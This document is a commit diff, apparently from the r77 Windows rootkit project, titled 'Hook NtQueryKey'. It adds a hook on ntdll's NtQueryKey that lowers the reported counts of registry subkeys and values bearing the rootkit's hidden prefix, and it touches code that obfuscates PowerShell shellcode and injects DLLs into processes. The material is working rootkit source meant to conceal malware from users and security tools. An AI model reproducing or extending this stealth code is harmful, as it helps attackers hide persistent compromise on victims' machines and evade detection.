Hook NtQueryKey

Author: bytecode77

Install/Install.c

@@ -281,7 +281,7 @@ VOID ObfuscatePowershellStringLiterals(LPWSTR command)
 	FREE(newCommand);
 	FREE(random);
 }
-VOID WriteShellCodeBytes(LPWSTR command, LPBYTE shellCode, DWORD size)
+VOID WriteShellCodeBytes(LPWSTR command, LPCBYTE shellCode, DWORD size)
 {
 	// Write shellcode bytes:
 	//  - Each byte is obfuscated using a simple addition or subtraction.

Install/Install.h

@@ -26,7 +26,7 @@ VOID ObfuscatePowershellStringLiterals(LPWSTR command);
 /// <param name="command">The powershell command to append the shellcode to.</param>
 /// <param name="shellCode">The shellcode bytes to append.</param>
 /// <param name="size">The number of bytes to append.</param>
-VOID WriteShellCodeBytes(LPWSTR command, LPBYTE shellCode, DWORD size);
+VOID WriteShellCodeBytes(LPWSTR command, LPCBYTE shellCode, DWORD size);
 /// <summary>
 /// Appends comma separated shellcode bytes to the command that represend a no-op, such as "mov eax, eax".
 /// </summary>

Unhook/Unhook.c

@@ -2,6 +2,7 @@
 #include "Syscalls.h"
 #include "ntdll.h"
 #include "peb.h"
+#include "r77win.h"
 #include <Shlwapi.h>
 
 // For now, unhooking works on 64-bit Windows only.

r77/Hooks.c

@@ -12,6 +12,7 @@ static NT_NTQUERYSYSTEMINFORMATION OriginalNtQuerySystemInformation;
 static NT_NTRESUMETHREAD OriginalNtResumeThread;
 static NT_NTQUERYDIRECTORYFILE OriginalNtQueryDirectoryFile;
 static NT_NTQUERYDIRECTORYFILEEX OriginalNtQueryDirectoryFileEx;
+static NT_NTQUERYKEY OriginalNtQueryKey;
 static NT_NTENUMERATEKEY OriginalNtEnumerateKey;
 static NT_NTENUMERATEVALUEKEY OriginalNtEnumerateValueKey;
 static NT_ENUMSERVICEGROUPW OriginalEnumServiceGroupW;
@@ -39,6 +40,7 @@ VOID InitializeHooks()
 	InstallHook("ntdll.dll", "NtResumeThread", (LPVOID*)&OriginalNtResumeThread, HookedNtResumeThread);
 	InstallHook("ntdll.dll", "NtQueryDirectoryFile", (LPVOID*)&OriginalNtQueryDirectoryFile, HookedNtQueryDirectoryFile);
 	InstallHook("ntdll.dll", "NtQueryDirectoryFileEx", (LPVOID*)&OriginalNtQueryDirectoryFileEx, HookedNtQueryDirectoryFileEx);
+	InstallHook("ntdll.dll", "NtQueryKey", (LPVOID*)&OriginalNtQueryKey, HookedNtQueryKey);
 	InstallHook("ntdll.dll", "NtEnumerateKey", (LPVOID*)&OriginalNtEnumerateKey, HookedNtEnumerateKey);
 	InstallHook("ntdll.dll", "NtEnumerateValueKey", (LPVOID*)&OriginalNtEnumerateValueKey, HookedNtEnumerateValueKey);
 	InstallHook("advapi32.dll", "EnumServiceGroupW", (LPVOID*)&OriginalEnumServiceGroupW, HookedEnumServiceGroupW);
@@ -73,6 +75,7 @@ VOID UninitializeHooks()
 	UninstallHook(OriginalNtResumeThread, HookedNtResumeThread);
 	UninstallHook(OriginalNtQueryDirectoryFile, HookedNtQueryDirectoryFile);
 	UninstallHook(OriginalNtQueryDirectoryFileEx, HookedNtQueryDirectoryFileEx);
+	UninstallHook(OriginalNtQueryKey, HookedNtQueryKey);
 	UninstallHook(OriginalNtEnumerateKey, HookedNtEnumerateKey);
 	UninstallHook(OriginalNtEnumerateValueKey, HookedNtEnumerateValueKey);
 	UninstallHook(OriginalEnumServiceGroupW, HookedEnumServiceGroupW);
@@ -371,6 +374,51 @@ static NTSTATUS NTAPI HookedNtQueryDirectoryFileEx(HANDLE fileHandle, HANDLE eve
 
 	return status;
 }
+static NTSTATUS NTAPI HookedNtQueryKey(HANDLE key, NT_KEY_INFORMATION_CLASS keyInformationClass, LPVOID keyInformation, ULONG length, PULONG resultLength)
+{
+	NTSTATUS status = OriginalNtQueryKey(key, keyInformationClass, keyInformation, length, resultLength);;
+
+	if (NT_SUCCESS(status) && (keyInformationClass == KeyFullInformation || keyInformationClass == KeyCachedInformation))
+	{
+		BYTE buffer[1024];
+		PNT_KEY_BASIC_INFORMATION keyBasicInformation = (PNT_KEY_BASIC_INFORMATION)buffer;
+		PNT_KEY_VALUE_BASIC_INFORMATION keyValueBasicInformation = (PNT_KEY_VALUE_BASIC_INFORMATION)buffer;
+
+		// Count number of hidden subkeys and values.
+		ULONG hiddenSubKeys = 0;
+		ULONG hiddenValues = 0;
+
+		for (ULONG i = 0; OriginalNtEnumerateKey(key, i, KeyBasicInformation, keyBasicInformation, 1024, resultLength) == ERROR_SUCCESS; i++)
+		{
+			if (HasPrefix(keyBasicInformation->Name))
+			{
+				hiddenSubKeys++;
+			}
+		}
+
+		for (ULONG i = 0; OriginalNtEnumerateValueKey(key, i, KeyValueBasicInformation, keyValueBasicInformation, 1024, resultLength) == ERROR_SUCCESS; i++)
+		{
+			if (HasPrefix(keyValueBasicInformation->Name))
+			{
+				hiddenValues++;
+			}
+		}
+
+		// Subtract count by hidden keys and values.
+		if (keyInformationClass == KeyFullInformation)
+		{
+			((PNT_KEY_FULL_INFORMATION)keyInformation)->SubKeys -= hiddenSubKeys;
+			((PNT_KEY_FULL_INFORMATION)keyInformation)->Values -= hiddenValues;
+		}
+		else if (keyInformationClass == KeyCachedInformation)
+		{
+			((PNT_KEY_CACHED_INFORMATION)keyInformation)->SubKeys -= hiddenSubKeys;
+			((PNT_KEY_CACHED_INFORMATION)keyInformation)->Values -= hiddenValues;
+		}
+	}
+
+	return status;
+}
 static NTSTATUS NTAPI HookedNtEnumerateKey(HANDLE key, ULONG index, NT_KEY_INFORMATION_CLASS keyInformationClass, LPVOID keyInformation, ULONG keyInformationLength, PULONG resultLength)
 {
 	if (keyInformationClass == KeyNodeInformation)

r77/Hooks.h

@@ -25,6 +25,7 @@ static NTSTATUS NTAPI HookedNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS sy
 static NTSTATUS NTAPI HookedNtResumeThread(HANDLE thread, PULONG suspendCount);
 static NTSTATUS NTAPI HookedNtQueryDirectoryFile(HANDLE fileHandle, HANDLE event, PIO_APC_ROUTINE apcRoutine, LPVOID apcContext, PIO_STATUS_BLOCK ioStatusBlock, LPVOID fileInformation, ULONG length, FILE_INFORMATION_CLASS fileInformationClass, BOOLEAN returnSingleEntry, PUNICODE_STRING fileName, BOOLEAN restartScan);
 static NTSTATUS NTAPI HookedNtQueryDirectoryFileEx(HANDLE fileHandle, HANDLE event, PIO_APC_ROUTINE apcRoutine, LPVOID apcContext, PIO_STATUS_BLOCK ioStatusBlock, LPVOID fileInformation, ULONG length, FILE_INFORMATION_CLASS fileInformationClass, ULONG queryFlags, PUNICODE_STRING fileName);
+static NTSTATUS NTAPI HookedNtQueryKey(HANDLE key, NT_KEY_INFORMATION_CLASS keyInformationClass, LPVOID keyInformation, ULONG length, PULONG resultLength);
 static NTSTATUS NTAPI HookedNtEnumerateKey(HANDLE key, ULONG index, NT_KEY_INFORMATION_CLASS keyInformationClass, LPVOID keyInformation, ULONG keyInformationLength, PULONG resultLength);
 static NTSTATUS NTAPI HookedNtEnumerateValueKey(HANDLE key, ULONG index, NT_KEY_VALUE_INFORMATION_CLASS keyValueInformationClass, LPVOID keyValueInformation, ULONG keyValueInformationLength, PULONG resultLength);
 static BOOL WINAPI HookedEnumServiceGroupW(SC_HANDLE serviceManager, DWORD serviceType, DWORD serviceState, LPBYTE services, DWORD servicesLength, LPDWORD bytesNeeded, LPDWORD servicesReturned, LPDWORD resumeHandle, LPVOID reserved);

r77api/clist.c

@@ -6,7 +6,7 @@ PINTEGER_LIST CreateIntegerList()
 	PINTEGER_LIST list = NEW(INTEGER_LIST);
 	list->Count = 0;
 	list->Capacity = 16;
-	list->Values = NEW_ARRAY(ULONG, list->Capacity);
+	list->Values = NEW_ARRAY(INT, list->Capacity);
 	return list;
 }
 VOID LoadIntegerListFromRegistryKey(PINTEGER_LIST list, HKEY key)
@@ -36,22 +36,22 @@ VOID DeleteIntegerList(PINTEGER_LIST list)
 	i_memset(list, 0, sizeof(INTEGER_LIST));
 	FREE(list);
 }
-VOID IntegerListAdd(PINTEGER_LIST list, ULONG value)
+VOID IntegerListAdd(PINTEGER_LIST list, INT value)
 {
 	if (list->Count == list->Capacity)
 	{
 		list->Capacity += 16;
-		PULONG newValues = NEW_ARRAY(ULONG, list->Capacity);
-		i_memcpy(newValues, list->Values, list->Count * sizeof(ULONG));
+		LPINT newValues = NEW_ARRAY(INT, list->Capacity);
+		i_memcpy(newValues, list->Values, list->Count * sizeof(INT));
 
-		PULONG oldValues = list->Values;
+		LPINT oldValues = list->Values;
 		list->Values = newValues;
 		FREE(oldValues);
 	}
 
 	list->Values[list->Count++] = value;
 }
-BOOL IntegerListContains(PINTEGER_LIST list, ULONG value)
+BOOL IntegerListContains(PINTEGER_LIST list, INT value)
 {
 	for (DWORD i = 0; i < list->Count; i++)
 	{

r77api/clist.h

@@ -3,22 +3,22 @@
 #define _CLIST_H
 
 /// <summary>
-/// Defines a collection of ULONG values.
+/// Defines a collection of INT values.
 /// </summary>
 typedef struct _INTEGER_LIST
 {
 	/// <summary>
-	/// The number of ULONG values in this list.
+	/// The number of INT values in this list.
 	/// </summary>
 	DWORD Count;
 	/// <summary>
 	/// The currently allocated capacity of the buffer. The buffer expands automatically when values are added.
 	/// </summary>
 	DWORD Capacity;
 	/// <summary>
-	/// A buffer that stores the ULONG values in this list.
+	/// A buffer that stores the INT values in this list.
 	/// </summary>
-	PULONG Values;
+	LPINT Values;
 } INTEGER_LIST, *PINTEGER_LIST;
 
 /// <summary>
@@ -64,21 +64,21 @@ VOID LoadIntegerListFromRegistryKey(PINTEGER_LIST list, HKEY key);
 /// <param name="list">The INTEGER_LIST structure to delete.</param>
 VOID DeleteIntegerList(PINTEGER_LIST list);
 /// <summary>
-/// Adds a ULONG value to the specified INTEGER_LIST.
+/// Adds an INT value to the specified INTEGER_LIST.
 /// </summary>
-/// <param name="list">The INTEGER_LIST structure to add the ULONG value to.</param>
-/// <param name="value">The ULONG value to add to the list.</param>
-VOID IntegerListAdd(PINTEGER_LIST list, ULONG value);
+/// <param name="list">The INTEGER_LIST structure to add the INT value to.</param>
+/// <param name="value">The INT value to add to the list.</param>
+VOID IntegerListAdd(PINTEGER_LIST list, INT value);
 /// <summary>
-/// Determines whether the ULONG value is in the specified INTEGER_LIST.
+/// Determines whether the INT value is in the specified INTEGER_LIST.
 /// </summary>
 /// <param name="list">The INTEGER_LIST structure to search.</param>
-/// <param name="value">The ULONG value to check.</param>
+/// <param name="value">The INT value to check.</param>
 /// <returns>
-/// TRUE, if the specified ULONG value is in the specified INTEGER_LIST;
+/// TRUE, if the specified INT value is in the specified INTEGER_LIST;
 /// otherwise, FALSE.
 /// </returns>
-BOOL IntegerListContains(PINTEGER_LIST list, ULONG value);
+BOOL IntegerListContains(PINTEGER_LIST list, INT value);
 /// <summary>
 /// Compares two INTEGER_LIST structures for equality.
 /// </summary>

r77api/ntdll.h

@@ -421,7 +421,14 @@ typedef enum _NT_KEY_INFORMATION_CLASS
 	KeyBasicInformation,
 	KeyNodeInformation,
 	KeyFullInformation,
-	KeyNameInformation
+	KeyNameInformation,
+	KeyCachedInformation,
+	KeyFlagsInformation,
+	KeyVirtualizationInformation,
+	KeyHandleTagsInformation,
+	KeyTrustInformation,
+	KeyLayerInformation,
+	MaxKeyInfoClass
 } NT_KEY_INFORMATION_CLASS;
 
 typedef enum _NT_KEY_VALUE_INFORMATION_CLASS
@@ -439,6 +446,33 @@ typedef struct _NT_KEY_BASIC_INFORMATION
 	WCHAR Name[1];
 } NT_KEY_BASIC_INFORMATION, *PNT_KEY_BASIC_INFORMATION;
 
+typedef struct _NT_KEY_FULL_INFORMATION
+{
+	LARGE_INTEGER LastWriteTime;
+	ULONG TitleIndex;
+	ULONG ClassOffset;
+	ULONG ClassLength;
+	ULONG SubKeys;
+	ULONG MaxNameLength;
+	ULONG MaxClassLength;
+	ULONG Values;
+	ULONG MaxValueNameLength;
+	ULONG MaxValueDataLength;
+	WCHAR Class[1];
+} NT_KEY_FULL_INFORMATION, *PNT_KEY_FULL_INFORMATION;
+
+typedef struct _NT_KEY_CACHED_INFORMATION
+{
+	LARGE_INTEGER LastWriteTime;
+	ULONG TitleIndex;
+	ULONG SubKeys;
+	ULONG MaxNameLength;
+	ULONG Values;
+	ULONG MaxValueNameLength;
+	ULONG MaxValueDataLength;
+	ULONG NameLength;
+} NT_KEY_CACHED_INFORMATION, *PNT_KEY_CACHED_INFORMATION;
+
 typedef struct _NT_KEY_NAME_INFORMATION
 {
 	ULONG NameLength;
@@ -748,6 +782,7 @@ typedef NTSTATUS(NTAPI *NT_NTQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS sy
 typedef NTSTATUS(NTAPI *NT_NTRESUMETHREAD)(HANDLE thread, PULONG suspendCount);
 typedef NTSTATUS(NTAPI *NT_NTQUERYDIRECTORYFILE)(HANDLE fileHandle, HANDLE event, PIO_APC_ROUTINE apcRoutine, LPVOID apcContext, PIO_STATUS_BLOCK ioStatusBlock, LPVOID fileInformation, ULONG length, FILE_INFORMATION_CLASS fileInformationClass, BOOLEAN returnSingleEntry, PUNICODE_STRING fileName, BOOLEAN restartScan);
 typedef NTSTATUS(NTAPI *NT_NTQUERYDIRECTORYFILEEX)(HANDLE fileHandle, HANDLE event, PIO_APC_ROUTINE apcRoutine, LPVOID apcContext, PIO_STATUS_BLOCK ioStatusBlock, LPVOID fileInformation, ULONG length, FILE_INFORMATION_CLASS fileInformationClass, ULONG queryFlags, PUNICODE_STRING fileName);
+typedef NTSTATUS(NTAPI *NT_NTQUERYKEY)(HANDLE key, NT_KEY_INFORMATION_CLASS keyInformationClass, LPVOID keyInformation, ULONG length, PULONG resultLength);
 typedef NTSTATUS(NTAPI *NT_NTENUMERATEKEY)(HANDLE key, ULONG index, NT_KEY_INFORMATION_CLASS keyInformationClass, LPVOID keyInformation, ULONG keyInformationLength, PULONG resultLength);
 typedef NTSTATUS(NTAPI *NT_NTENUMERATEVALUEKEY)(HANDLE key, ULONG index, NT_KEY_VALUE_INFORMATION_CLASS keyValueInformationClass, LPVOID keyValueInformation, ULONG keyValueInformationLength, PULONG resultLength);
 typedef BOOL(WINAPI *NT_ENUMSERVICEGROUPW)(SC_HANDLE serviceManager, DWORD serviceType, DWORD serviceState, LPBYTE services, DWORD servicesLength, LPDWORD bytesNeeded, LPDWORD servicesReturned, LPDWORD resumeHandle, LPVOID reserved);

r77api/r77header.c

@@ -10,7 +10,7 @@ WORD GetR77Header(LPVOID *detachAddress)
 		WORD signature = *(LPWORD) & module[sizeof(IMAGE_DOS_HEADER)];
 		if (signature == R77_SIGNATURE || signature == R77_SERVICE_SIGNATURE || signature == R77_HELPER_SIGNATURE)
 		{
-			if (detachAddress) *detachAddress = *(PDWORD64) & module[sizeof(IMAGE_DOS_HEADER) + 2];
+			if (detachAddress) *detachAddress = (LPVOID) * (PDWORD64) & module[sizeof(IMAGE_DOS_HEADER) + 2];
 			return signature;
 		}
 	}

r77api/r77process.c

@@ -21,7 +21,7 @@ BOOL InjectDll(DWORD processId, LPBYTE dll, DWORD dllSize)
 			if (GetProcessFileName(processId, processName, MAX_PATH))
 			{
 				LPCWSTR exclusions[] = PROCESS_EXCLUSIONS;
-				for (int i = 0; i < sizeof(exclusions) / sizeof(LPCWSTR); i++)
+				for (ULONG i = 0; i < sizeof(exclusions) / sizeof(LPCWSTR); i++)
 				{
 					if (!StrCmpIW(processName, exclusions[i]))
 					{